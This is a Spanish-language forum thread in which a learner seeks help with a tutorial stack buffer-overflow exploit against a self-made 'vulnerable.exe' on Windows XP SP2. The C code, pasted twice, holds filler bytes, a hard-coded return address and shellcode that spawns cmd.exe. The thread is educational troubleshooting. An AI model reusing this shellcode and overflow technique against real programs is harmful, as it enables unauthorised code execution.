Autor
necesito ayuda... bueno yo cre que demasiada... es que todavia soy aprendiz en exploits.... ya mas o menos le estoy entendiendo.... pero aun me falta entender mas cosas... espero me puedan ayudar..
estoy aprendiendo del exploit de rojodos... ya hice el archivo vulnerable y el exploit.. pero cuando ejecuto el exploit me aparece una shel ms-dos con lo que dice en el manual de rojodos que pongamos en printf para ver que sucede pero solo me aparece por unos segundos.. y despues me aparece otra pantalla de ms-dos pero no hay nada y desaparece a los 2 segundos de haber ejecutado el exploit... me imagino que entonces el exploit esta mal hecho... pero no se que hacer... les dejo el codigo para ver si pueden ayudarme..
Código:
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>
int main(int argc, char**argv)
{
char evilbuffer[1024]="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQQRRRRSSSS";
char shellcode[]="\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6"
"\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45\xF8\x50\xBB\xC7\x93\xC2\x77\xFF\xD3";
char offset[]="\xED\xE1\x49\xC7";
strcat(evilbuffer,offset);
strcat(evilbuffer,shellcode);
printf("Cadena+offset+shellcode en formato printable\n");
printf("%s",evilbuffer);
ShellExecute(NULL,"OPEN","vulnerable.exe",evilbuffer,NULL,true);
return 0;
}
#include <stdlib.h>
#include <windows.h>
#include <string.h>
int main(int argc, char**argv)
{
char evilbuffer[1024]="AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQQRRRRSSSS";
char shellcode[]="\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6"
"\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45\xF8\x50\xBB\xC7\x93\xC2\x77\xFF\xD3";
char offset[]="\xED\xE1\x49\xC7";
strcat(evilbuffer,offset);
strcat(evilbuffer,shellcode);
printf("Cadena+offset+shellcode en formato printable\n");
printf("%s",evilbuffer);
ShellExecute(NULL,"OPEN","vulnerable.exe",evilbuffer,NULL,true);
return 0;
}
que estoy haceindo mal.. estoy usando windows xp sp2... y estoy usando visual c++ 6.0
alguien ayudeme porfavor...
Les mando un saludo... GRACIAS
hola
Alguien de casualidad a hecho el ejemplo de exploit de rojodos y le a salido bien...
Podrian poner una imagen de como deberia o que deberia pasar al ejecutar el exploit porfavor...
Es que por mas que le busco no encuentro como hacerlo funcionar.. y tambien no se que deberia de suceder al ejecutar el exploit.. cry
Tambien alguien sabe si este ejemplo aun funiona en Windows xp sp2... porfa si alguien me puede ayudar se los agradezco...
Salu2.. Gracias wink
hola
ya modifique el codigo... y ya me aparece el mensaje de error en el archivo vulnerable... sin embargo, solamente me aparece la shell del exploit, y la del archivo vulnerable... despues me aparece el mensaje de error y desaparece todo... alguien me podria decir si eso es todo o todavia me haria falta que me aparezca una shell del exploit, ya que estuve utilizando un exploit para ver como funcionaban.. y despues de ejecutarlo me aparece otra shell para revisar los directorios y cuando la cierro, me aparece el mensaje de error del programa y todo desaparce, creo que eso es normal... pero en el exploit de ejemplo de rojodos... solamente me aparecen las dos shell´s... el mensaje de error y desaparece todo.. creo que estoy haciendo algo mal... alguien sabe que podria estar haciendo mal porfavor..
les mando un saludo.. gracias grin
En línea
